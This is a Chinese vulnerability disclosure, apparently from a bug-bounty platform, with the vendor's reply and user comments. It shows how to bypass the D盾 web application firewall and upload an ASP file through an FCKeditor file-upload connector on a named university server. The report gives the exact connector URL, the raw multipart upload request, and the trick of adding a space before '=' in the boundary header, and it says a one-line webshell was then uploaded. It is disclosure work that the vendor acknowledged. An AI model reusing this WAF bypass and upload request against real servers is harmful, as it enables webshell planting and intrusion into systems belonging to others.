D盾WebShell上传拦截bypass

http://sjxy.ycu.jx.cn/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=%2F

FckEditor任意文件上传，然而被D盾无情地拦掉了。

经过以前的经验进行测试，发现针对安全狗那套对D盾完全没有作用...

数据包的重要部分如下：

Content-Type: multipart/form-data; boundary=---------------------------7e01a1e2070e
 Accept-Encoding: gzip, deflate
 Content-Length: 233
 Host: sjxy.ycu.jx.cn
 Pragma: no-cache
 
 -----------------------------7e01a1e2070e
 Content-Disposition: form-data; name="NewFile"; filename="test.asp"
 Content-Type: application/octet-stream
 
 <%response.write("23333334-1")%>
 -----------------------------7e01a1e2070e--

当尝试把头部中的Content-Type: multipart/form-data; boundary=---------------------------7e01a1e2070e改一下时，奇迹出现了。

测试（boundary和=之间加个空格）：

Content-Type: multipart/form-data; boundary =---------------------------7e01a1e2070e

同样的方法顺利上传了一句话：

考虑一些特殊情况

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2016-03-10 16:58

厂商回复：

D盾 一直在努力完善，但还是会有没能考虑到位的地方。一直认为用户的安全比什么都重要,欢迎技术宅指正！啊D 联系QQ：

最新状态：

暂无

1. 2016-03-09 22:59 | phantomer ( 路人 | Rank:10 漏洞数:5 | 菜比一个。求勿喷。)

   2

   我靠，感觉收藏一下。

   1# 回复此人

2. 2016-03-10 08:30 | 永不言弃 ( 路人 | Rank:19 漏洞数:8 | 敏锐者)

   2

   空格这么屌，不知道对其他的网站适用吗，赞！！！

   2# 回复此人

3. 2016-03-11 11:46 | term ( 普通白帽子 | Rank:132 漏洞数:35 )

   2

   @phantomer 八戒 为师来看你装逼了

   3# 回复此人

4. 2016-03-11 13:17 | phantomer ( 路人 | Rank:10 漏洞数:5 | 菜比一个。求勿喷。)

   2

   @term 哟，通用王来了

   4# 回复此人

5. 2016-03-11 13:48 | term ( 普通白帽子 | Rank:132 漏洞数:35 )

   2

   @phantomer 我是大彩笔，倒是你 ，你死了，我要告诉老大去，上班时间开小差，来乌云溜达，哈哈哈。

   5# 回复此人